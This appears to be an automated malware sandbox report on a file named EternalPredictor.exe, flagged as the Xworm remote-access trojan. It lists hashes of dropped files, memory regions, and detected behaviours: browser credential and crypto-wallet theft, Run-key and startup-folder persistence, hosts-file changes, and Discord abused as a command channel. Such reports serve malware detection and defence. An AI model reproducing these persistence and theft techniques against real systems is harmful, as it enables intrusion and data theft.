MD5 862f820c3251e4ca6fc0ac00e4092239
SHA1 ef96d84b253041b090c243594f90938e9a487a9a
SHA256 36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153
SHA512 2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

memory/4544-62-0x00007FFDDD6D0000-0x00007FFDDDD33000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI32882\base_library.zip

MD5 a9cbd0455b46c7d14194d1f18ca8719e
SHA1 e1b0c30bccd9583949c247854f617ac8a14cbac7
SHA256 df6c19637d239bfedc8cd13d20e0938c65e8fdf340622ff334db533f2d30fa19
SHA512 b92468e71490a8800e51410df7068dd8099e78c79a95666ecf274a9e9206359f049490b8f60b96081fafd872ec717e67020364bcfa972f26f0d77a959637e528

C:\Users\Admin\AppData\Local\Temp\_MEI32882\_ctypes.pyd

MD5 79879c679a12fac03f472463bb8ceff7
SHA1 b530763123bd2c537313e5e41477b0adc0df3099
SHA256 8d1a21192112e13913cb77708c105034c5f251d64517017975af8e0c4999eba3
SHA512 ca19ddaefc9ab7c868dd82008a79ea457acd71722fec21c2371d51dcfdb99738e79eff9b1913a306dbedacb0540ca84a2ec31dc2267c7b559b6a98b390c5f3a7

memory/4544-67-0x00007FFDF1430000-0x00007FFDF1457000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI32882\_ssl.pyd

MD5 7ef27cd65635dfba6076771b46c1b99f
SHA1 14cb35ce2898ed4e871703e3b882a057242c5d05
SHA256 6ef0ef892dc9ad68874e2743af7985590bb071e8afe3bbf8e716f3f4b10f19b4
SHA512 ac64a19d610448badfd784a55f3129d138e3b697cf2163d5ea5910d06a86d0ea48727485d97edba3c395407e2ccf8868e45dd6d69533405b606e5d9b41baadc0

memory/4544-85-0x00007FFDF6B70000-0x00007FFDF6B7F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI32882\_sqlite3.pyd

MD5 8cd40257514a16060d5d882788855b55
SHA1 1fd1ed3e84869897a1fad9770faf1058ab17ccb9
SHA256 7d53df36ee9da2df36c2676cfaea84ee87e7e2a15ad8123f6abb48717c3bc891
SHA512 a700c3ce95ce1b3fd65a9f335c7c778643b2f7140920fe7ebf5d9be1089ba04d6c298bf28427ca774fbf412d7f9b77f45708a8a0729437f136232e72d6231c34

C:\Users\Admin\AppData\Local\Temp\_MEI32882\_socket.pyd

MD5 14392d71dfe6d6bdc3ebcdbde3c4049c
SHA1 622479981e1bbc7dd13c1a852ae6b2b2aebea4d7
SHA256 a1e39e2386634069070903e2d9c2b51a42cb0d59c20b7be50ef95c89c268deb2
SHA512 0f6359f0adc99efad5a9833f2148b066b2c4baf564ba16090e04e2b4e3a380d6aff4c9e7aeaa2ba247f020f7bd97635fcdfe4e3b11a31c9c6ea64a4142333424

C:\Users\Admin\AppData\Local\Temp\_MEI32882\_queue.pyd

MD5 513dce65c09b3abc516687f99a6971d8
SHA1 8f744c6f79a23aa380d9e6289cb4504b0e69fe3b
SHA256 d4be41574c3e17792a25793e6f5bf171baeeb4255c08cb6a5cd7705a91e896fc
SHA512 621f9670541cac5684892ec92378c46ff5e1a3d065d2e081d27277f1e83d6c60510c46cab333c6ed0ff81a25a1bdc0046c7001d14b3f885e25019f9cdd550ed0

C:\Users\Admin\AppData\Local\Temp\_MEI32882\_lzma.pyd

MD5 055eb9d91c42bb228a72bf5b7b77c0c8
SHA1 5659b4a819455cf024755a493db0952e1979a9cf
SHA256 de342275a648207bef9b9662c9829af222b160975ad8925cc5612cd0f182414e
SHA512 c5cba050f4b805a299f5d04ec0dce9b718a16bc335cac17f23e96519da0b9eaaf25ae0e9b29ef3dc56603bfe8317cdc1a67ee6464d84a562cf04bea52c31cfac

C:\Users\Admin\AppData\Local\Temp\_MEI32882\_hashlib.pyd

MD5 d6f123c4453230743adcc06211236bc0
SHA1 9f9ade18ac3e12bcc09757a3c4b5ee74cf5e794e
SHA256 7a904fa6618157c34e24aaac33fdf84035215d82c08eec6983c165a49d785dc9
SHA512 f5575d18a51207b4e9df5bb95277d4d03e3bb950c0e7b6c3dd2288645e26e1de8edcf634311c21a6bdc8c3378a71b531f840b8262db708726d36d15cb6d02441

C:\Users\Admin\AppData\Local\Temp\_MEI32882\_decimal.pyd

MD5 21d27c95493c701dff0206ff5f03941d
SHA1 f1f124d4b0e3092d28ba4ea4fe8cf601d5bd8600
SHA256 38ec7a3c2f368ffeb94524d7c66250c0d2dafe58121e93e54b17c114058ea877
SHA512 a5fbda904024cd097a86d6926e0d593b0f7e69e32df347a49677818c2f4cd7dc83e2bab7c2507428328248bd2f54b00f7b2a077c8a0aad2224071f8221cb9457

C:\Users\Admin\AppData\Local\Temp\_MEI32882\_bz2.pyd

MD5 58fc4c56f7f400de210e98ccb8fdc4b2
SHA1 12cb7ec39f3af0947000295f4b50cbd6e7436554
SHA256 dfc195ebb59dc5e365efd3853d72897b8838497e15c0977b6edb1eb347f13150
SHA512 ad0c6a9a5ca719d244117984a06cce8e59ed122855e4595df242df18509752429389c3a44a8ba0abc817d61e37f64638ccbdffc17238d4c38d2364f0a10e6bc7

C:\Users\Admin\AppData\Local\Temp\_MEI32882\unicodedata.pyd

MD5 b2712b0dd79a9dafe60aa80265aa24c3
SHA1 347e5ad4629af4884959258e3893fde92eb3c97e
SHA256 b271bd656e045c1d130f171980ed34032ac7a281b8b5b6ac88e57dce12e7727a
SHA512 4dc7bd1c148a470a3b17fa0b936e3f5f68429d83d552f80051b0b88818aa88efc3fe41a2342713b7f0f2d701a080fb9d8ac4ff9be5782a6a0e81bd759f030922

C:\Users\Admin\AppData\Local\Temp\_MEI32882\sqlite3.dll

MD5 21aea45d065ecfa10ab8232f15ac78cf
SHA1 6a754eb690ff3c7648dae32e323b3b9589a07af2
SHA256 a1a694b201976ea57d4376ae673daa21deb91f1bf799303b3a0c58455d5126e7
SHA512 d5c9dc37b509a3eafa1e7e6d78a4c1e12b5925b5340b09bee06c174d967977264c9eb45f146abed1b1fc8aa7c48f1e0d70d25786ed46849f5e7cc1c5d07ac536

C:\Users\Admin\AppData\Local\Temp\_MEI32882\select.pyd

MD5 fb70aece725218d4cba9ba9bbb779ccc
SHA1 bb251c1756e5bf228c7b60daea1e3b6e3f9f0ff5
SHA256 9d440a1b8a6a43cfaa83b9bc5c66a9a341893a285e02d25a36c4781f289c8617
SHA512 63e6db638911966a86f423da8e539fc4ab7eb7b3fb76c30c16c582ce550f922ad78d1a77fa0605caffa524e480969659bf98176f19d5effd1fc143b1b13bbaaf

C:\Users\Admin\AppData\Local\Temp\_MEI32882\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI32882\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI32882\libssl-3.dll

MD5 b2e766f5cf6f9d4dcbe8537bc5bded2f
SHA1 331269521ce1ab76799e69e9ae1c3b565a838574
SHA256 3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4
SHA512 5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

C:\Users\Admin\AppData\Local\Temp\_MEI32882\libcrypto-3.dll

MD5 8377fe5949527dd7be7b827cb1ffd324
SHA1 aa483a875cb06a86a371829372980d772fda2bf9
SHA256 88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d
SHA512 c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

C:\Users\Admin\AppData\Local\Temp\_MEI32882\blank.aes

MD5 1be47f04f81b4c7c0b83e59ad5fee5ce
SHA1 a8f99aa6c5099db5047c5795d96bcb3027558403
SHA256 0c9c4af5acafbc2e3f9611f3778ec6bc2db3cc5b9cc33259b4ce2d9658e2e9ab
SHA512 b98887394d17a51b4cda9053c7bc071b7776fc5887c415715bd9211828158eb7e44d2a4b376c95ade9dbec529afd656589cebe82d8b0e6177d2489bcf7befae0

C:\Users\Admin\AppData\Local\Temp\_MEI32882\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

memory/4544-92-0x00007FFDF0F30000-0x00007FFDF0F5B000-memory.dmp

memory/4544-95-0x00007FFDF0420000-0x00007FFDF0445000-memory.dmp

memory/4544-97-0x00007FFDDCCA0000-0x00007FFDDCE1F000-memory.dmp

memory/4544-93-0x00007FFDF13A0000-0x00007FFDF13B9000-memory.dmp

memory/4544-104-0x00007FFDECBF0000-0x00007FFDECC24000-memory.dmp

memory/4544-103-0x00007FFDF1410000-0x00007FFDF1429000-memory.dmp

memory/4544-102-0x00007FFDDD6D0000-0x00007FFDDDD33000-memory.dmp

memory/4544-112-0x00000251F37E0000-0x00000251F3D13000-memory.dmp

memory/4544-110-0x00007FFDDC160000-0x00007FFDDC693000-memory.dmp

memory/4544-109-0x00007FFDF6B60000-0x00007FFDF6B6D000-memory.dmp

memory/4568-108-0x00007FFDFDB20000-0x00007FFDFDBBE000-memory.dmp

memory/4544-107-0x00007FFDDF9C0000-0x00007FFDDFA8E000-memory.dmp

memory/4544-116-0x00007FFDF1430000-0x00007FFDF1457000-memory.dmp

memory/4568-117-0x00007FFDFDB20000-0x00007FFDFDBBE000-memory.dmp

memory/4544-119-0x00007FFDF0F10000-0x00007FFDF0F24000-memory.dmp

memory/4544-121-0x00007FFDF0750000-0x00007FFDF075D000-memory.dmp

memory/4544-126-0x00007FFDDF900000-0x00007FFDDF9B3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ui1tdhor.j3i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4564-132-0x0000025FB6640000-0x0000025FB6662000-memory.dmp

memory/4544-228-0x00007FFDF0420000-0x00007FFDF0445000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\s1nf3keq\s1nf3keq.cmdline

MD5 915562b6d647a265ec0cc552dfcccd5f
SHA1 3829ea60ddbb9a4b249846c51ba1d1da0fd6d412
SHA256 6ea28231dad63b899c6326f5d2742bcdfb6e9614cb8fa0899501e0e49c85873a
SHA512 2849ca9970f2e915e61e1ccf757de77bb09d697f3190f9ddcf3ab098be7d42f2f1d7cb240d2e6b57c2cef3187c75e1170acd9830e576a80ac69b176a4375d51a

\??\c:\Users\Admin\AppData\Local\Temp\s1nf3keq\s1nf3keq.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\s1nf3keq\CSCACB1B33F42B34ED4BD7F3B32DB16E06.TMP

MD5 e9082f5c6ead9d8d132c69279c2b2902
SHA1 14282ff1c4b10cc6b58c5259377081af68a759e5
SHA256 2c504d8f050bfc8fd2654c8dfdcd23287a1fae60c5bad1eb5bc262efc2aa0571
SHA512 592d58bce4172838866a8e1d59a1b85b1f3aada983a1cbb52e51b6b4240d74e584055fd99a6375ac287651adbfe36c28f6508e09e81c0c41c7e27ab127534090

C:\Users\Admin\AppData\Local\Temp\s1nf3keq\s1nf3keq.dll

MD5 418990e99dac8e98ef8a658d331459be
SHA1 ec0349abb90fe20e7e4f4ab61bc2a6b54ffd6d45
SHA256 1b1a8a0705c8d79d27ec85cfe5b167a9d3183b53adadcf03151af2a639a3ef01
SHA512 2ae8d3757accdb1d5f02c0a71d2e5d961ba88683e818e2387aad3ab4e1b9ae7e98689826d6fc9ae489324a4d96cfad2619b799d32ebbd21adf01b6242b28f116

memory/3780-244-0x00000208264B0000-0x00000208264B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RESB65F.tmp

MD5 4fb2c2b7c3d40eb4e85919927d56e0b8
SHA1 1699d7365a1dbe0525cc94f59b86a5dce7424fec
SHA256 398b0c0b498698fffbcdbba89fe75ca0fb372025564a8b132acf636028005b97
SHA512 9a858da9fe8c0d0920520232487bb0713f2628018b62441bb5f79bf04f17d1091f343213206f30c4c3c7bb88895a15d606cb39b31f9d4c7929668c3c6a56628c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8740e7db6a0d290c198447b1f16d5281
SHA1 ab54460bb918f4af8a651317c8b53a8f6bfb70cd
SHA256 f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5
SHA512 d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 387a4a1cd9242130d99dc1a3f7fc54be
SHA1 468cee7abc4e6d322399e01b0b3381da5b17c867
SHA256 45c0e94bfcaee73dd1a6e6cfb70a04debdbbf7d0b7bb17250381aed70ac29186
SHA512 edaf4d3905a0aa5eec46f63900af77d688e32c4e6705a79f5d68f230080e6184d0153ae333e69e0c0be9e25a23e3a6921cefcd2270c1ec85e18dffc5b9ddcd05

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

memory/4544-283-0x00007FFDDCCA0000-0x00007FFDDCE1F000-memory.dmp

memory/4544-284-0x00007FFDDF9C0000-0x00007FFDDFA8E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a28115a0b99e1628f4b22fe751626704
SHA1 f6c1a3bb1c46eea1d8ac31551e3b91b2004fc57e
SHA256 8fe0f9cb43d348eeb8de56f9ccca2ca5b787978f2e41b861bb04a5b134839f60
SHA512 7ee7051a3dbe621096dcf7c3b2c0ccd6c5ca30729bf3322597b74e8299c742a5653c73b9a7013a2565dc7a0da3de0af4a6fb4c38417748469983bf1117b16ee1

memory/4544-330-0x00007FFDECBF0000-0x00007FFDECC24000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\   ‏‌​‌ ‏​\Common Files\Desktop\CompareResolve.xlsx

MD5 7c7d8dffe6dcc730daa968b2a1ab3f22
SHA1 448bf6450d87a1a9d224f830a4885a921c981acc
SHA256 f2811d4fada2f259860a19903e85642685dee2be841ab7e222ce24447c5ae2fe
SHA512 fba61a43963637f4a9981acb5471535f960fbb42ffeeb80f2cfcb2940da28366b6dd4aed85485d42cad62414895f3fde061ef7396557ac225a4da64d5ca98288

C:\Users\Admin\AppData\Local\Temp\   ‏‌​‌ ‏​\Common Files\Desktop\ConnectDisconnect.docx

MD5 3e3104a10424dbded3bc6eda3a61de32
SHA1 d2dc577a9126f4d512beddf30ae616b9f793dba7
SHA256 ab1d6251f7cce4cc852bfdd9f3f13dfa0f1ecfa55360cfcc786533c2b4bdb30f
SHA512 7687214e1c336bcf08320f5a8d2b808edb716e332bfedb4db03a75186daa2b84e77b93f83323de05e170d5b9b0bdd2e2af44e90852a7bd99ab7d8c6eeb9ba624

C:\Users\Admin\AppData\Local\Temp\   ‏‌​‌ ‏​\Common Files\Desktop\EnableUndo.docx

MD5 6378066cdac30c6a60bc09885f389527
SHA1 839972d201ad25fb8f78498f0cea695868a7ae9d
SHA256 012d46c39e287eb37a2ef4a84b79685aa3e176ba2128ebb9cbfd6f8470f97108
SHA512 392a6f703bd56078088200a9a2223397a097163eb38af69e38affa4904f012427b824ef75b1cc914f6e38bf1f3e3637f86d12742dfbb131ed0cb8716fc66ed6b

memory/4544-337-0x00007FFDDC160000-0x00007FFDDC693000-memory.dmp

memory/4544-339-0x00007FFDDD6D0000-0x00007FFDDDD33000-memory.dmp

memory/4544-345-0x00007FFDDCCA0000-0x00007FFDDCE1F000-memory.dmp

memory/4544-354-0x00000251F37E0000-0x00000251F3D13000-memory.dmp

memory/4568-375-0x00007FFDFDB20000-0x00007FFDFDBBE000-memory.dmp

memory/4544-387-0x00007FFDDF9C0000-0x00007FFDDFA8E000-memory.dmp

memory/4544-391-0x00007FFDDF900000-0x00007FFDDF9B3000-memory.dmp

memory/4544-402-0x00007FFDF0F10000-0x00007FFDF0F24000-memory.dmp

memory/4544-401-0x00007FFDDC160000-0x00007FFDDC693000-memory.dmp

memory/4544-400-0x00007FFDECBF0000-0x00007FFDECC24000-memory.dmp

memory/4544-399-0x00007FFDF1410000-0x00007FFDF1429000-memory.dmp

memory/4544-398-0x00007FFDDCCA0000-0x00007FFDDCE1F000-memory.dmp

memory/4544-397-0x00007FFDF6B60000-0x00007FFDF6B6D000-memory.dmp

memory/4544-396-0x00007FFDF0420000-0x00007FFDF0445000-memory.dmp

memory/4544-395-0x00007FFDF0F30000-0x00007FFDF0F5B000-memory.dmp

memory/4544-394-0x00007FFDF6B70000-0x00007FFDF6B7F000-memory.dmp

memory/4544-393-0x00007FFDF1430000-0x00007FFDF1457000-memory.dmp

memory/4544-392-0x00007FFDF13A0000-0x00007FFDF13B9000-memory.dmp

memory/4544-390-0x00007FFDF0750000-0x00007FFDF075D000-memory.dmp

memory/4544-377-0x00007FFDDD6D0000-0x00007FFDDDD33000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-17 10:10

Reported

2024-11-17 10:13

Platform

win11-20241007-en

Max time kernel

124s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Xworm family

xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\program.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\skuld.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
